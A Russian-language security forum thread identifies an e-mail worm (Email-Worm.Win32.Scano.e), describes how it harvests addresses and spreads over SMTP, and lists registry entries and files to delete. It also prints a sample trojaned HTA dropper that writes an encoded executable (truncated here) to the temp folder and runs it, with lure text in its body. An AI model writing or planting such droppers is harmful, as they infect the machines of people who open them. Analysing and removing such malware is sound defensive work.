ANTICHAT — форум по информационной безопасности, OSINT и технологиям

скачал, открыл - vbs скрипт, и дира " C: " .. ... .. лог. бомба? =)

это Email-Worm.Win32.Scano.e.
Расширение .hta это СИ

...троян это скорее всего.... у меня даже конвектор был exe2hta.....

__________________

нет это не троян. я же написал что это червь....
он сканит машину на адреса почты. Ищит адреса в следующих файлах:
adb asp cfg cgi dbx dhtm dhtml eml htm html jsp mbx mdx mht mmf mra msg nch ods oft php pl sht shtm stm tbb txt uin wab wsh xls xml и рассылает себя по найденым адресам. Причем рассылает себя используя примое подключение к SMTP серваку.
Для удаления, если уже подхватили:
Удалить из реестра вот эти записи.
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]
"Debugger"="%Windir%\csrss.exe"
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Application"="%Windir\csrss.exe"
и вот эти файлы
%Windir%\csrss.exe
C:\ntldr.exe

затрояненный HTA-файл может выглядеть примерно так.

<font color="#008000"><HTML>
<HEAD><hta:application />

<SCRIPT language="JavaScript">

code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян

var fso = new ActiveXObject("Scripting.FileSystemObject");

var tf = fso.GetSpecialFolder(2); // Получим windows\temp
var fn = tf + "\\x.exe"; // Добавим имя файла

var a = fso.CreateTextFile(fn, true); // Запишем в файл тело трояна
a.Write(unescape(code));
a.Close();

var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Exec(fn); // Запустим его

</SCRIPT>
</HEAD>
<BODY>
Привет, чувак!
TheBat не показывает картинки, так что открой этот файл в Ехплорере.
</BODY>
</HTML></font>
---------------------------------------------------------------------------------------------------
вопрос что за этот код и как и с чем его едят

code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян

or1, нах поднял тему 2-х летней давности?

некропостер!11один